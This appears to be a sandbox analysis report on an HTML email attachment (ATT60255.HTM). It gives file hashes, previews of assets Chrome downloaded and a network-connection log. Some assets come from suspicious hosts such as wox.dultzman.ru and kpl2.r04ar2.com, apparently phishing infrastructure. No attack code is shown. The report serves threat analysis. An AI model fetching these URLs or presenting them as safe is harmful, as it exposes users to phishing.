                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):1400
                                                          Entropy (8bit):7.808470583085035
                                                          Encrypted:false
                                                          SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                          MD5:333EE830E5AB72C41DD9126A27B4D878
                                                          SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                          SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                          SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                          Malicious:false
                                                          Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):231
                                                          Entropy (8bit):6.725074433303473
                                                          Encrypted:false
                                                          SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                          MD5:547988BAC5584B4608466D761E16F370
                                                          SHA1:C11BB71049702528402A31027F200184910A7E23
                                                          SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                          SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                          Malicious:false
                                                          Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):29796
                                                          Entropy (8bit):7.980058333789969
                                                          Encrypted:false
                                                          SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                          MD5:210433A8774859368F3A7B86D125A2A7
                                                          SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                          SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                          SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                          Malicious:false
                                                          Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):7390
                                                          Entropy (8bit):4.02755241095864
                                                          Encrypted:false
                                                          SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                          MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                          SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                          SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                          SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                          Malicious:false
                                                          Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1434), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):1434
                                                          Entropy (8bit):5.761950198369007
                                                          Encrypted:false
                                                          SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtJ1PdcsLqo4p:VKEctKo7LmvtUjPKtX7T1PdtLrwUnG
                                                          MD5:CE3E019BC27E936BD1AACDB64B25A06D
                                                          SHA1:30FFA6E52416FF966EC2DD32922AA14C18C4039B
                                                          SHA-256:EE18FA1ADA74C5D3261424BCC1C4F077510C31A06BEE0FF6742F180ED14C57D8
                                                          SHA-512:98A6AD516944CD646083FF660ED351E9130318B6DA4F457EBFC0C6953F3D662D770A54D0533F97220691E07FABFD5305CD13409DB80CB7F83D650ED5BFCA8B4F
                                                          Malicious:false
                                                          URL:https://www.google.com/recaptcha/api.js
                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:very short file (no magic)
                                                          Category:downloaded
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          URL:https://wox.dultzman.ru/yujumitzgvwdmelzinmewQxtLOYJNEVXSSDHIHSVCETCIEVPNERHTXNUMDDPXUKLBBLLJCZAYXXBKOEQPMAUCC
                                                          Preview:0
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):61
                                                          Entropy (8bit):3.990210155325004
                                                          Encrypted:false
                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                          Malicious:false
                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):727
                                                          Entropy (8bit):7.573165690842521
                                                          Encrypted:false
                                                          SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                          MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                          SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                          SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                          SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136
                                                          Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                          Category:downloaded
                                                          Size (bytes):28000
                                                          Entropy (8bit):7.99335735457429
                                                          Encrypted:true
                                                          SSDEEP:768:NDT1rKvlJOE1AgLlnGj8H58AJUcl5I17ML7FfNHubNIphqb:NDtKvyAhjHeACcl21YL7KNW+
                                                          MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                          SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                          SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                          SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/rsudZieQRPg934N9fbuv40
                                                          Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):268
                                                          Entropy (8bit):5.111190711619041
                                                          Encrypted:false
                                                          SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                          MD5:59759B80E24A89C8CD029B14700E646D
                                                          SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                          SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                          SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                          Malicious:false
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):70712
                                                          Entropy (8bit):6.94130504124589
                                                          Encrypted:false
                                                          SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                          MD5:F70FF06D19498D80B130EC78176FD3FF
                                                          SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                          SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                          SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/staE25xquFIms1ubbV5xl8DLBnj3Wsk45GqF2Do244R3qvQUFMkQXp58H3Gfgh260
                                                          Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):270
                                                          Entropy (8bit):4.840496990713235
                                                          Encrypted:false
                                                          SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                          MD5:40EB39126300B56BF66C20EE75B54093
                                                          SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                          SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                          SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                          Malicious:false
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                          File type:HTML document, Unicode text, UTF-8 text, with very long lines (2363), with CRLF line terminators
                                                          Entropy (8bit):5.715415157644816
                                                          TrID:
                                                          • Scalable Vector Graphics (18501/1) 31.09%
                                                          • HyperText Markup Language (12001/1) 20.17%
                                                          • HyperText Markup Language (12001/1) 20.17%
                                                          • HyperText Markup Language (11001/1) 18.49%
                                                          • HyperText Markup Language (6006/1) 10.09%
                                                          File name:ATT60255.HTM
                                                          File size:8'390 bytes
                                                          MD5:45a5630a8866c09a1ebbf976cd4063b8
                                                          SHA1:016e3ac60bbc732a6ec220b9e9e61b07e5efda76
                                                          SHA256:4fbc40af35b1a3e69cf0adf2bf86a06d750babffcbce39650dbded3e11de0433
                                                          SHA512:6016a373bfa5c4e35c978872974c455478de400d5d40bf04881ba6dec8de32463804e845f3d356df0eb2c69df57276c5cf92062800138a40ecef9b3893201c57
                                                          SSDEEP:96:10sdK86IlAf85d/f16vXV8arAjzyLNr9ZT4GMzc0++uXYiMSx0WKJ+riZiFhsh1T:OH89Esd/f4vXVRAvyRr9Z1MzwH7xDAfN
                                                          TLSH:F40209039094003AA0AB57F556B8F70DAA2FD02D43020BD93D7E6B434FE997910776F8
                                                          File Content Preview:<html>.. <head>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <style>.. @font-face { font-family: system; font-style: normal; font-weight: 300; src: local(".SFNSText-Light
                                                          Icon Hash:173149cccc490307
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 28, 2024 00:10:18.983211994 CEST49675443192.168.2.4173.222.162.32
                                                          Aug 28, 2024 00:10:28.594260931 CEST49675443192.168.2.4173.222.162.32
                                                          Aug 28, 2024 00:10:29.270000935 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.270055056 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.270108938 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.270517111 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.270535946 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.751825094 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.752090931 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.752115965 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.752441883 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.752511978 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.753110886 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.753160954 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.754045963 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.754107952 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.754229069 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.796510935 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.893321991 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.893338919 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.894269943 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.894337893 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.910300016 CEST49736443192.168.2.4192.0.78.26
                                                          Aug 28, 2024 00:10:29.910317898 CEST44349736192.0.78.26192.168.2.4
                                                          Aug 28, 2024 00:10:29.957237005 CEST49739443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:29.957290888 CEST44349739188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:29.957360029 CEST49739443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:29.957742929 CEST49739443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:29.957758904 CEST44349739188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:30.546612024 CEST44349739188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:30.546809912 CEST49739443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:30.546835899 CEST44349739188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:30.547852039 CEST44349739188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:30.547923088 CEST49739443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:30.548783064 CEST49739443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:30.548813105 CEST49739443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:30.548860073 CEST44349739188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:30.548890114 CEST49739443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:30.548927069 CEST49739443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:30.549211979 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:30.549246073 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:30.549335957 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:30.549572945 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:30.549587011 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:31.036077976 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:31.096174002 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:31.139643908 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:31.139666080 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:31.140696049 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:31.140727043 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:31.140782118 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:31.150614977 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:31.150696039 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:31.150959015 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:31.150968075 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:31.191270113 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:32.833041906 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:32.833163977 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:32.833197117 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:32.833213091 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:32.833240986 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:32.833308935 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:32.833309889 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:32.833323956 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:32.833365917 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:32.833381891 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:32.833481073 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:32.833530903 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:32.856910944 CEST49743443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:10:32.856934071 CEST44349743172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:10:32.857007980 CEST49743443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:10:32.857490063 CEST49743443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:10:32.857503891 CEST44349743172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:10:33.091510057 CEST49740443192.168.2.4188.114.96.3
                                                          Aug 28, 2024 00:10:33.091521978 CEST44349740188.114.96.3192.168.2.4
                                                          Aug 28, 2024 00:10:33.156934023 CEST49744443192.168.2.4188.114.97.3
                                                          Aug 28, 2024 00:10:33.156980991 CEST44349744188.114.97.3192.168.2.4
